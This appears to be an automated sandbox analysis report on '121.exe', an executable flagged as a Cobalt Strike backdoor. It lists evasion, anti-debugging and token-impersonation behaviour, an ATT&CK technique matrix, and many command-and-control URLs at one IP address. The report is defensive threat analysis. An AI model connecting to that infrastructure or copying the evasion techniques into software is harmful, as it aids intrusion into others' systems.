              Source: C:\Users\user\Desktop\121.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\121.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CED83C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00CED83C
              Source: 121.exeStatic PE information: section name: .xdata
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A6776C push 0000006Ah; retf 0_2_00A67784
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D1916C push 0000006Ah; retf 0_2_00D19184
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D001A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D001A8

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00CF5854, 0_2_00CF5854
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00CEFA1C, 0_2_00CEFA1C
              Source: C:\Users\user\Desktop\121.exe, Window / User API: threadDelayed 2300
              Source: C:\Users\user\Desktop\121.exe, Window / User API: threadDelayed 7577
              Source: C:\Users\user\Desktop\121.exe, Evasive API call chain: GetLocalTime,DecisionNodes, graph_0-37488
              Source: C:\Users\user\Desktop\121.exe, Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes, graph_0-37631
              Source: C:\Users\user\Desktop\121.exe, API coverage: 6.4 %
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00CEFA1C, 0_2_00CEFA1C
              Source: C:\Users\user\Desktop\121.exe TID: 7080, Thread sleep count: 2300 > 30
              Source: C:\Users\user\Desktop\121.exe TID: 7080, Thread sleep time: -23000000s >= -30000s
              Source: C:\Users\user\Desktop\121.exe TID: 3572, Thread sleep time: -60000s >= -30000s
              Source: C:\Users\user\Desktop\121.exe TID: 7080, Thread sleep count: 7577 > 30
              Source: C:\Users\user\Desktop\121.exe TID: 7080, Thread sleep time: -75770000s >= -30000s
              Source: all processes, Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\121.exe, Last function: Thread delayed
              Source: C:\Users\user\Desktop\121.exe, Last function: Thread delayed
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00CF9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose, 0_2_00CF9220
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00CF1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose, 0_2_00CF1C30
              Source: C:\Users\user\Desktop\121.exe, Thread delayed: delay time: 60000
              Source: 121.exe, 00000000.00000002.4495724989.000000000008C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAWp/
              Source: 121.exe, 00000000.00000003.2941581497.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3270332274.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3031853030.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2155147374.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3449261664.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2548055513.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2758216720.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2185358392.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2820180707.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3417364243.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.0000000000106000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\121.exe, API call chain: ExitProcess graph end node, graph_0-37560

              Anti Debugging

              Source: C:\Users\user\Desktop\121.exe, Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep, graph_0-37224
              Source: C:\Users\user\Desktop\121.exe, Process Stats: CPU usage > 42% for more than 60s
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00D0F810 MultiByteToWideChar,MultiByteToWideChar,DebuggerProbe,DebuggerRuntime,IsDebuggerPresent,_RTC_GetSrcLine,WideCharToMultiByte,WideCharToMultiByte, 0_2_00D0F810
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00D09744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00D09744
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00CED83C GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00CED83C
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00D0C0C8 _lseeki64_nolock,_lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,_setmode_nolock,__doserrno,_errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,SetEndOfFile,_errno,__doserrno,GetLastError,_lseeki64_nolock, 0_2_00D0C0C8
              Source: all processes, Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA, 0_2_00401180
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00402F62 SetUnhandledExceptionFilter, 0_2_00402F62
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 0_2_00401A70
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_004542E4 SetUnhandledExceptionFilter,TlsGetValue, 0_2_004542E4
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00D044D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00D044D0
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00D124F0 SetUnhandledExceptionFilter, 0_2_00D124F0

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match, File source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTR
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00CFDF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError, 0_2_00CFDF50
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00CFDEC8 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00CFDEC8
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle, 0_2_00401630
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00454244 CreateThread,GetSystemTimeAsFileTime, 0_2_00454244
              Source: C:\Users\user\Desktop\121.exe, Code function: 0_2_00CF5E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf, 0_2_00CF5E28
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF5E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_00CF5E28
              Source: C:\Users\user\Desktop\121.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Remote Access Functionality

Source: Yara match | File source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTR
Source: Yara match | File source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00CF6A78 socket,htons,ioctlsocket,closesocket,bind,listen
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00CFEE8C socket,closesocket,htons,bind,listen
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00CF6670 htonl,htons,socket,closesocket,bind,ioctlsocket
MITRE ATT&CK Matrix (techniques listed per tactic, in matrix order; a leading number on a technique is the signature-count badge shown in the matrix cell)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 2 Valid Accounts; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 2 Valid Accounts; 21 Access Token Manipulation; 1 Process Injection; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 2 Valid Accounts; 212 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 1 Process Injection; 2 Obfuscated Files or Information; 1 DLL Side-Loading; Compile After Delivery; Indicator Removal from Tools; HTML Smuggling
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 341 Security Software Discovery; 212 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 Application Window Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 4 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 2 Encrypted Channel; 1 Non-Standard Port; 1 Ingress Tool Transfer; 1 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Source | Detection | Scanner | Label
121.exe | 87% | ReversingLabs | Win64.Backdoor.CobaltStrike
121.exe | 100% | Avira | HEUR/AGEN.1344321
121.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
https://152.42.226.16:60421/cald | 0% | Avira URL Cloud | safe
https://152.42.226.16/8 | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/a | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/capd | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/caM | 0% | Avira URL Cloud | safe
152.42.226.16 | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/cavcsOdb | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/T | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/V | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/ca | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/cafa.dM | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/k | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/cax | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/WNIt | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/ca8 | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/cagK | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/?r | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/- | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/ca2dY | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/b | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/cap | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/car | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/ | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/cagd | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/2 | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/caTd | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/cab | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/caJda | 0% | Avira URL Cloud | safe
http://127.0.0.1:%u/ | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/cavd | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/226.16:60421/ | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/caEdh | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/caIdd | 0% | Avira URL Cloud | safe
https://152.42.226.16/ | 0% | Avira URL Cloud | safe
https://152.42.226.16:60421/caOdb | 0% | Avira URL Cloud | safe
              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
152.42.226.16 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://152.42.226.16/8 | 121.exe, 00000000.00000002.4495724989.000000000008C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/caM | 121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/a | 121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/cald | 121.exe, 00000000.00000003.4130796318.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4072645930.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/V | 121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/capd | 121.exe, 00000000.00000003.2821596006.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2820180707.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2156494637.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2126844172.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2155147374.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2792190012.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/T | 121.exe, 00000000.00000003.3151184537.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3179225688.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/ca | 121.exe, 00000000.00000003.2331738304.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3358305653.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/cavcsOdb | 121.exe, 00000000.00000003.2972819737.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3002324860.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2943712531.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3000783488.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2913297438.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/cafa.dM | 121.exe, 00000000.00000003.2517825725.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2519144542.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/WNIt | 121.exe, 00000000.00000003.2126844172.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/ca8 | 121.exe, 00000000.00000003.3092041130.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3120178982.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4014515237.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3122009496.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2303817957.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2334091700.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2331738304.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/cax | 121.exe, 00000000.00000003.3835071770.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2882630735.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2185358392.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2215028734.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2850541886.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2517825725.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2519144542.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2880742433.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2913297438.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2422827917.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2455534442.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/k | 121.exe, 00000000.00000003.2364494903.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2422827917.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2392522291.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/- | 121.exe, 00000000.00000003.2364494903.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2331738304.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2422827917.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2392522291.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2303817957.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/ca2dY | 121.exe, 00000000.00000003.3893306724.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3540285999.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3599182783.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4366341910.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3509521159.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/cagK | 121.exe, 00000000.00000002.4495724989.000000000008C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/?r | 121.exe, 00000000.00000003.2665805385.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/b | 121.exe, 00000000.00000003.2548055513.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2517825725.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/cap | 121.exe, 00000000.00000003.4249526901.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3893306724.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3270332274.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2694595334.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2665805385.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3062381181.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3031853030.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2821596006.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3479245632.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2882630735.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3477221868.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4072645930.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2697480697.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3449261664.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2850541886.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3300306811.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3298309211.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4366341910.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2880742433.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2943712531.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/ | 121.exe, 00000000.00000003.2726578993.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2364494903.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2607132749.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2548055513.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2517825725.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2758216720.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3151184537.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3477221868.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2245055221.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3210323568.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2665805385.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3329829025.0000000000127000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2635387413.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3238480994.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2972819737.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3060018775.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2331738304.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3092041130.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3449261664.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/car | 121.exe, 00000000.00000003.3092041130.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2972819737.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3120178982.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3002324860.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3122009496.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3000783488.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/cagd | 121.exe, 00000000.00000003.2364494903.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2393839164.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2392522291.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2758216720.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2726578993.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2759574404.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/2 | 121.exe, 00000000.00000003.2726578993.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2607132749.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2548055513.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2665805385.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2635387413.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2576279859.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2694595334.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
